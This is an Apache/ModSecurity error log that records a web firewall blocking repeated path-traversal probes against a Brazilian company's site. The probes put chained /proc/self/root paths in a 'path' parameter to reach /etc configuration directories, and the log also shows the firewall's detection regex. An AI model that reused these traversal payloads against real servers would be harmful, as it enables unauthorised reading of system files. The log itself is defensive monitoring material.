[Fri Mar 20 07:00:58.178405 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.243.128:36602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a2hCii7xarUs8iHZa9gAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:02.116794 2026] [:error] [pid 9818:tid 140411683178240] [client 74.7.243.128:43394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a3l1pVZ5mVmJwsFMipwAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:04.586331 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.243.128:43402] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a4BCii7xarUs8iHZbAAAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:06.907818 2026] [:error] [pid 9818:tid 140411548894976] [client 74.7.243.128:43404] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a4V1pVZ5mVmJwsFMiqQAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:11.790469 2026] [:error] [pid 31215:tid 140411733534464] [client 74.7.243.128:43412] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a5wF0L0L-SsrnPo5bmwAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:13.142905 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.243.128:57156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a6fXLqtnMIWvjpaKNnwAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:14.481100 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.243.128:57166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a6gF0L0L-SsrnPo5bnAAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:20.082448 2026] [:error] [pid 21219:tid 140411557287680] [client 74.7.243.128:57176] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a8PXLqtnMIWvjpaKNrgAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:22.511137 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.243.128:38766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a8vqxLDW4GITHUkTZCgAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:25.874916 2026] [mime_magic:error] [pid 26799:tid 140411699963648] (70014)End of file found: [client 57.141.18.81:56360] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:01:27.228700 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:38780] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a99a6ubjKNq_cu4bGvQAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:28.485826 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.243.128:38786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a-F1pVZ5mVmJwsFMitAAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:29.782929 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.243.128:44634] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a-fqxLDW4GITHUkTZDgAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:31.095735 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.243.128:44650] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a-xCii7xarUs8iHZbCQAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:32.255008 2026] [:error] [pid 11642:tid 140411699963648] [client 74.7.243.128:44662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a_Lninkcc-iUj5ApSBwAAA4U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:34.629413 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.243.128:44676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a_hCii7xarUs8iHZbDQAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:37.204157 2026] [:error] [pid 11642:tid 140411641214720] [client 74.7.243.128:44688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a_7ninkcc-iUj5ApSDAAAA4w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:39.841176 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:44690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0bA-oXxyEfFpUF8f91NQAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:41.190980 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.243.128:43444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0bBfqxLDW4GITHUkTZGgAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:42.542234 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.243.128:43446] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0bBhCii7xarUs8iHZbFQAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:43.889710 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.243.128:43452] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0bBwF0L0L-SsrnPo5brQAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:01:45.231521 2026] [:error] [pid 21219:tid 140411658000128] [client 74.7.243.128:43460] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0bCfXLqtnMIWvjpaKNtAAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
